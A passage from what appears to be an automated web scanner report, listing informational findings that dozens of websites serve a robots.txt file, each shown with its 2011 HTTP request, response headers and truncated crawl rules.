The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.immunize.org

Response

HTTP/1.1 200 OK
Content-Length: 367
Content-Type: text/plain
Last-Modified: Mon, 01 Jan 2007 02:47:00 GMT
Accept-Ranges: bytes
ETag: "0aa121c4f2dc71:570"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:34:10 GMT
Connection: close

# robots.txt for http://www.immunize.org/
User-agent: *
Disallow: /temp/
Disallow: /stats/
Disallow: /outdated/
Disallow: /LinkAn/
Disallow: /inrevision/
Disallow: /p1/
Disallow: /search/
Dis
...[SNIP]...

26.537. http://www.indianagazette.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.indianagazette.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.indianagazette.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2115504
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:30:09 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0416
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: indianagazette.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 1683

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/?
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow:
...[SNIP]...

26.538. http://www.infoniagara.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.infoniagara.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.infoniagara.com

Response

HTTP/1.1 200 OK
Content-Length: 13739
Content-Type: text/plain
Last-Modified: Mon, 18 Apr 2011 15:36:22 GMT
Accept-Ranges: bytes
ETag: "e9ebe5edefdcb1:644"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:25 GMT
Connection: close

User-agent: *
Disallow: /hotels_and_motels/
Disallow: /Hotels-Mo...s/
Disallow: /niagara/
Disallow: /d-att-canal.html
Disallow: /hotels_and_motels/Niagara-Falls/bestwestern/jacuzzi.html
Disallow
...[SNIP]...

26.539. http://www.inform.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.inform.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inform.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 07 Mar 2011 16:19:08 GMT
ETag: "687fa-27e-daef5700"
Accept-Ranges: bytes
Content-Length: 638
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /feeds/
Disallow: /admin/
Disallow: /inc/
Disallow: /img/
Disallow: /js/
Disallow: /css/

# Rules to help clean up URL errors from old site versions
Disallow: *?puburl=
Disallo
...[SNIP]...

26.540. http://www.innerauto.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.innerauto.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.innerauto.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:55 GMT
Server: Apache
Last-Modified: Sat, 28 Aug 2010 01:35:50 GMT
ETag: "e54e46-d8-40516980"
Accept-Ranges: bytes
Content-Length: 216
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /catalog/
Disallow: /store/
Disallow: /details/
Disallow: /yp/
Disallow: /Parts_List/
Disallow: /Shop_Accessories/
Disallow: /Shop_Performance/
Disallow: /Shop_OEM/
Disallow: /
...[SNIP]...

26.541. http://www.innogames.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.innogames.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.innogames.de

Response

HTTP/1.0 200 OK
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 03 May 2011 10:49:01 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: tc-cms
tcs-time: 1304419741
Content-Length: 143
Content-Type: text/plain;charset=utf-8
Connection: close

User-agent: *
Disallow: /s/
Disallow: /css/
Disallow: /img/
Disallow: /js/
Disallow: /reseller/
Sitemap: http://www.innogames.de/m/sitemap.xml

26.542. http://www.insanelymac.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insanelymac.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insanelymac.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:15 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.insanelymac.com/xmlrpc.php
X-Node: edge3
Content-Length: 24
Content-Type: text/plain; charset=utf-8
Set-Cookie: PHPSESSID=gpie9r4c7li6mag6gpu0tfcnq6; path=/
Set-Cookie: wordpress_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/wp-admin; domain=.insanelymac.com
Set-Cookie: wordpress_sec_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/wp-admin; domain=.insanelymac.com
Set-Cookie: wordpress_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/wp-content/plugins; domain=.insanelymac.com
Set-Cookie: wordpress_sec_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/wp-content/plugins; domain=.insanelymac.com
Set-Cookie: wordpress_logged_in_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Set-Cookie: wordpress_logged_in_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Set-Cookie: wordpress_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Set-Cookie: wordpress_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Set-Cookie: wordpress_sec_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Set-Cookie: wordpress_sec_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Set-Cookie: wordpressuser_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Set-Cookie: wordpresspass_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Set-Cookie: wordpressuser_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Set-Cookie: wordpresspass_322da74cd836aa93f422ce16da8b994a=+; expires=Mon, 03-May-2010 11:41:15 GMT; path=/; domain=.insanelymac.com
Connection: close

User-agent: *
Disallow:

26.543. http://www.insidesales.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidesales.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insidesales.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:45 GMT
Server: Apache
Set-Cookie: PHPSESSID=79c630b6908b6443ca0b7492d5235dc1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 397
Connection: close
Content-Type: text/html

User-agent:*
Disallow: /images/
Disallow: /secure/
Disallow: /cgi-bin/
Disallow: /js/
Allow: /images/Logoworks_project.pdf
Allow: /images/ResponseDealer%20Flyer.pdf
Allow: /images/ResponseDeale
...[SNIP]...

26.544. http://www.insurancecomplete.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insurancecomplete.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insurancecomplete.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/plain
Last-Modified: Wed, 23 Apr 2008 15:17:59 GMT
Accept-Ranges: bytes
ETag: "e83463755a5c81:472"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:59:35 GMT
Connection: close

User-agent: *
Disallow: /resources/

User-Agent: Googlebot-Image
Disallow: /

26.545. http://www.integratelecom.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.integratelecom.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.integratelecom.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:45 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 20:12:34 GMT
ETag: "1cdfa97-5c-33b99080"
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/plain

# robots.txt for http://www.integratelecom.com/

User-agent: *
Disallow: /promotions/

26.546. http://www.interiormall.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interiormall.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interiormall.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 22 Feb 2011 22:01:01 GMT
Accept-Ranges: bytes
ETag: "b4116fedbd2cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:25:20 GMT
Connection: close
Content-Length: 757

User-agent: *
Sitemap: http://www.interiormall.com/sitemap.xml
Disallow: /*color=*
Disallow: /*orderby=*
Disallow: /*page=1&*
Disallow: /*ref=*
Disallow: /*searchresults*
Disallow: /*wt=*
Disa
...[SNIP]...

26.547. http://www.internationaloddities.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.internationaloddities.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.internationaloddities.com

Response

HTTP/1.1 200 OK
Content-Length: 376
Content-Type: text/plain
Content-Location: http://www.internationaloddities.com/robots.txt
Last-Modified: Wed, 08 Apr 2009 18:44:29 GMT
Accept-Ranges: bytes
ETag: "f49c8cc7ab8c91:dda"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:03:25 GMT
Connection: close

User-agent: *
Disallow: /affiliate/
Disallow: /promo/
Disallow: /intcom/
Disallow: /opt_in/
Disallow: /page.css
Disallow: /free.swf
Disallow: /top.swf
Disallow: /bottom.swf
Disallow: /home.sw
...[SNIP]...

26.548. http://www.interstatemusic.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interstatemusic.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interstatemusic.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:02:27 GMT
Server: Apache
Last-Modified: Tue, 14 Dec 2010 14:29:29 GMT
ETag: "5445c-5a-a5f7a440"
Accept-Ranges: bytes
Content-Length: 90
Connection: close
Content-Type: text/plain; charset=windows-1252

User-agent: *
Allow: /

Sitemap: http://www.interstatemusic.com/sitemapindex.xml

26.549. http://www.interstateplastics.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interstateplastics.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interstateplastics.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:55:25 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 15 Feb 2010 12:50:31 GMT
ETag: "2f8171f-16-47fa30ff5b3c0"
Accept-Ranges: bytes
Content-Length: 22
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

26.550. http://www.ionchannels.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ionchannels.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ionchannels.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:13 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Sat, 05 Jun 2010 00:11:16 GMT
ETag: "60486c9-2f1-4883d4736d100"
Accept-Ranges: bytes
Content-Length: 753
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /linkbar.php
Disallow: /redirect.php
Disallow: /hp/export.php

User-agent: Mediapartners-Google
Disallow: /linkbar.php
Disallow: /redirect.php
Disallow: /hp/export.php

...[SNIP]...

26.551. http://www.ipodwizard.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ipodwizard.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ipodwizard.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:43:22 GMT
Server: Apache
Last-Modified: Mon, 04 Apr 2011 07:23:55 GMT
Accept-Ranges: bytes
Content-Length: 801
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ajax.php
Disallow: /attachment.php
Disallow: /calendar.php
Disallow: /cron.php
Disallow: /editpost.php
Disallow: /global.php
Disallow: /image.php
Disallow: /inlinemod.php
Disa
...[SNIP]...

26.552. http://www.ireland.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ireland.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ireland.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 19 Apr 2011 09:01:07 GMT
Accept-Ranges: bytes
ETag: "f961fa5170fecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:30:04 GMT
Connection: close
Content-Length: 87

User-agent: *
Disallow:

Sitemap: http://www.ireland.com/sitemaps/sitemap_index.xml

26.553. http://www.irfanview.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.irfanview.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.irfanview.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:51 GMT
Server: Apache/2.2
Last-Modified: Fri, 28 Apr 2006 14:43:09 GMT
ETag: "82811220-ad-4127eb930b940"
Accept-Ranges: bytes
Content-Length: 173
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /images
Disallow: /test
Disallow: /update
Disallow: /statistik
Disallow: /newstatistik
Disallow: /foto
Disallow: /cgi-bin
Disallow: /google

26.554. http://www.isagoodies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.isagoodies.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.isagoodies.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 17 Mar 2011 20:21:06 GMT
ETag: "62f0da0-6c-49eb366b03080"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /admin/
Disallow: /cont/
Disallow: /themes/
Disallow: /scripts/

26.555. http://www.iso.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iso.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iso.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:51 GMT
Server: Apache/2.2.11 (Unix)
Last-Modified: Wed, 17 Dec 2008 10:32:35 GMT
ETag: "575984-342-45e3b981d96c0"
Accept-Ranges: bytes
Content-Length: 834
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /iso/en/search.html
Disallow: /iso/fr/search.html
Disallow: /iso/search.html
Disallow: /iso/search/extendedsearchstandards.htm
Disallow: /iso/en/search/extendedsearchstandards.
...[SNIP]...

26.556. http://www.itmonline.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.itmonline.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itmonline.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:04:56 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Fri, 04 Apr 2003 20:30:01 GMT
ETag: "d0183-85-3ba81036aa440"
Accept-Ranges: bytes
Content-Length: 133
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for www.itmonline.org
# email webmaster@itmonline.org with any problems
User-agent: *
disallow: /cgi-bin
disallow: java

26.557. http://www.itsmarta.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.itsmarta.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itsmarta.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Content-Location: http://www.itsmarta.com/robots.txt
Last-Modified: Mon, 08 Dec 2008 21:58:01 GMT
Accept-Ranges: bytes
ETag: "c8845a8059c91:11e0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:56:13 GMT
Connection: close
Set-Cookie: BIGipServerpreview-pool=251729324.36895.0000; path=/

User-agent: *
Disallow:

26.558. http://www.ius.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ius.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ius.edu

Response

HTTP/1.1 200 OK
Content-Length: 2538
Content-Type: text/plain
Content-Location: http://www.ius.edu/robots.txt
Last-Modified: Tue, 09 Mar 2004 18:54:14 GMT
Accept-Ranges: bytes
ETag: "04f61ea76c41:4364"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:52:48 GMT
Connection: close

User-agent: *
Disallow: /bat
Disallow: /bldghrs2
Disallow: /cgi-bin
Disallow: /clang
Disallow: /conedweb
Disallow: /course
Disallow: /cs
Disallow: /dates
Disallow: /departments
Disallow: /er
...[SNIP]...

26.559. http://www.jackdaniels.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jackdaniels.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jackdaniels.com

Response

HTTP/1.0 200 OK
Content-Length: 110
Content-Type: text/plain
Last-Modified: Wed, 14 Apr 2010 19:48:07 GMT
Accept-Ranges: bytes
ETag: "82858767bdcca1:584"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:24 GMT
Connection: close

User-agent: *
Disallow: /UploadedFiles
Disallow: /Admin
Allow: /
Disallow: /WorkArea
Disallow: /email

26.560. http://www.jakewilson.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jakewilson.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jakewilson.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:13 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 21:04:59 GMT
ETag: "1290f-107-4a04658746db8"
Accept-Ranges: bytes
Content-Length: 263
Connection: close
Content-Type: text/plain

# Configure for web crawlers

User-agent: *
Disallow: /old-emailsales
Disallow: /DealerApplication.pdf
Disallow: /Application.pdf
Disallow: /search.do?keyword=stiffy+flags
http://www.jakewilscon.com/w
...[SNIP]...

26.561. http://www.jameshardie.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jameshardie.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jameshardie.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:05 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e DAV/2 PHP/5.2.17 mod_jk/1.2.26 SVN/1.4.4
Last-Modified: Tue, 11 Jan 2011 21:13:40 GMT
ETag: "6a0430-a9-499988eff0900"
Accept-Ranges: bytes
Content-Length: 169
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /pdf/install/disallow/
Disallow: /admin/
Disallow: /stats/
User-agent: YandexImages
Disallow: /dealer/
Disallow: /developer/
Disallow: /builder/

26.562. http://www.jaxed.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jaxed.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jaxed.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:43 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 11 Feb 2011 18:05:18 GMT
ETag: "ece67b-62-49c058a6cd380"
Accept-Ranges: bytes
Content-Length: 98
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /YabbHelp/
Disallow: /ul.html
Disallow: /ul/

User-agent: 008
Disallow: /

26.563. http://www.jeepsunlimited.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jeepsunlimited.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jeepsunlimited.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:20 GMT
Server: Apache/2.2.16 (Atomic)
Last-Modified: Tue, 08 Feb 2011 14:20:35 GMT
ETag: "5140f8-b5-49bc60d4072c0"
Accept-Ranges: bytes
Content-Length: 181
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /images
Disallow: /members
Disallow: /openxads
Disallow: /pdf
Disallow: /storyimages
Disallow: /tj
Disallow: /wj
Disallow: /xj
Disallow: /zj
Crawl-delay: 30

26.564. http://www.jeffcopublicschools.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jeffcopublicschools.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jeffcopublicschools.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:54 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.7 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 30 Nov 2010 23:31:03 GMT
ETag: "1024-84-4964d94fb7bc0"
Accept-Ranges: bytes
Content-Length: 132
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.565. http://www.jefferslivestock.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jefferslivestock.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jefferslivestock.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 03 May 2011 11:00:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8202
Content-Type: text/html
Set-Cookie: sh%5Fpr=Y; expires=Wed, 11-May-2011 03:59:00 GMT; path=/
Set-Cookie: eid=; expires=Wed, 11-May-2011 11:00:00 GMT; path=/
Set-Cookie: oc=SITE; expires=Wed, 11-May-2011 11:00:00 GMT; path=/
Set-Cookie: ky=; expires=Wed, 11-May-2011 11:00:00 GMT; path=/
Set-Cookie: id=0909090909; expires=Thu, 02-May-2013 11:00:40 GMT; path=/
Set-Cookie: ASPSESSIONIDAAQSBDTB=MNJKOHNDEFJEOMLOJDDJPKGC; path=/
Cache-control: private

F:\Web_content\JEFF\WebRoot\robots_site.txt# ROBOTS.TXT: 03/05/2008

# keep "dangerous" bots out of everything
# keep all bots out of the listed files and folders

User-agent: Gigabot
Disallow:
...[SNIP]...

26.566. http://www.jinni.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jinni.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jinni.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Set-Cookie: JSESSIONID=A529058F7AE997A0946FB1E4F08FD5D6.web2_node3; Path=/
ETag: W/"253-1302208426000"
Last-Modified: Thu, 07 Apr 2011 20:33:46 GMT
Content-Length: 253
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /pages/overload.html
Disallow: /pages/sorry_404.html
Disallow: /pages/sorry_error.html
Disallow: /core-team.html

User-agent: Googlebot
Disallow: /*?page=*
Disallow: /*
...[SNIP]...

26.567. http://www.jjc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jjc.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jjc.edu

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Length: 871
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 21:01:02 GMT
ETag: "{C57A0D15-B72D-40F8-94EA-D6A553939960},6"
Server: Microsoft-IIS/7.0
ResourceTag: rt:C57A0D15-B72D-40F8-94EA-D6A553939960@00000000006
Exires: Mon, 18 Apr 2011 10:58:27 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:58:27 GMT
Connection: close
Set-Cookie: BIGipServerjjc.edu=364773386.20480.0000; path=/

User-Agent: *
Allow: /
Disallow: /WebResource.axd
Disallow: /info/
Disallow: /agri/
Disallow: /aqip/
Disallow: /blazer/
Disallow: /bookstore/
Disallow: /business/
Disallow: /careers/
Disallo
...[SNIP]...

26.568. http://www.jjgames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jjgames.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jjgames.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:01 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Wed, 30 Mar 2011 20:10:36 GMT
ETag: "13519-9c-49fb8c5130700"
Accept-Ranges: bytes
Content-Length: 156
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 11:07:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.jjgames.com/sitemap.xml
Disallow: /cart/
Disallow: /item/
Disallow: /request/
Disallow: /page/index
Disallow: /page/home

26.569. http://www.jkharris.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jkharris.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jkharris.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:40:03 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 08 Mar 2011 22:17:04 GMT
ETag: "fb4471-6cb-f8d87800"
Accept-Ranges: bytes
Content-Length: 1739
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:40:03 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

26.570. http://www.jobinfo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jobinfo.com
